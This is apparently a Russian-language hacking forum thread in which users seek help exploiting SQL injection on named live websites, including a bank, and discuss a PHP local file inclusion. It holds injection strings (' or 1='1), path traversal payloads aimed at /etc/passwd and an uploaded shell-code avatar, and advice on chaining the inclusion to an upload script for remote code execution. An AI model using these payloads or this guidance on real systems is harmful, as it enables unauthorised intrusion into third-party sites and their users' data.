всем привет, кто может, помогиет раскрутить эту скулю: Code: http://www.sala amsombank.com/pages.php?id=\
там нету иньекции, там есть ошибка от спец-символа. логика не срабатывает. http://www.salaamsombank.com/pages.php?id=(1)
подскажите пожалуйста есть ли в этом коде уязвимость ,если есть ток как её воспроизвести file.php?url=site.com%00 на такой запрос выдает ошибку Warning: include_once(): Failed opening 'site.com' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/site/public_html/domain.site.com/file.php on line 23 PHP: <?php$url = @$_REQUEST['url'];$currenturl = explode("/",$url);$getlang = "";//include the lang in this array$lanarray = array('en','hi','ar','cn','id','ms');if( @$currenturl[0]=='' || !in_array($currenturl[0],$lanarray)){ $defaulLang ="en";}else{ $defaulLang =@$currenturl[0];}$siteUrl = "http://$_SERVER[HTTP_HOST]"."/~ttttt/domain.site.com/";$filepath = 'lang/'.@$defaulLang.'.ini';if(file_exists($filepath)){ $getlang = parse_ini_file($filepath);}if($url!=''){ include_once basename($url).".php";}else{ include_once "home.php";}?>
на сколько я понимаю - url=../../../etc/passwd%00 url=../../../var/www/site/upload/evil_avatar_with_shell_code.gif%00 при условии, что функция basename() нам ничего не портит.
file.php?url=../../../etc/passwd%00 Warning: include_once(): Failed opening 'passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/site/public_html/domain.site.com/file.php on line 23
http://www.php.su/functions/?basename Code: <?php $path = "/home/httpd/html/index.php"; $file = basename($path); // $file содержит "index.php" $file = basename($path, ".php"); // $file содержит "index" ?> то бишь вектор сужается до дириктории, из которой выполняется сценарий.
Уязвимость есть, но не шибко юзабельная. Если положить или изменить любой файл в этой директории, будет RCE. Так же стоит посмотреть, можно ли там подцепить что-то интересное для дальнейшего развития атаки. Простейший пример: Уязвим index.php. Рядом лежит upload.php который подключается в admin.php. В админку стоит логин/пароль, а upload.php проверяет наличие коннекта к базе и не может быть вызван напрямую. Следовательно, воспользовавшись локальным инклудом в index.php можно подцепить скрипт загрузки и залить что-то нехорошее
всем привет. хочу в свой Интернет магазин впендюрить чат. Допустим клиент заходит на главную страницу сайта и появляется окно чата где оператор или бот ( вначале) помогает клиенту с выбором товара. Помогите оценить какие либо риски. Какие уязвимости стоит рассмотреть. Вообще большинство таких чатов представляют опасность ?
Для начала скажите какую платформу вы используете. В зависимости от этого можно будет обрисовать потенциальные уязвимости. Опаснотсть представляют не чаты, опасность представляют упущения в коде. А за небольшую сумму проведу black box + white box аудит с подробным отчетом.
Что можно сделать тут? Code: http://www.rapibus.sto.ca/index.php?id=176&no_cache=1&tx_ttnews[tt_news]=169'&tx_ttnews[backPid]=176&cHash=1ee0e52092
SERVER /index.php?id=176&no_cache=1&tx_ttnews[backPid]=176&tx_ttnews[tt_news]=169' or 1='1 HTTP/1.1 Host: www.rapibus.sto.ca User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: Connection: close Content-Length: 0
скорее так себе маркетолог я могу аудировать лишь пхп платформу из веб платформ и владею не всеми критикал уязвимостями кстати, https://ru.wikipedia.org/wiki/HTTP тут этого почему-то нету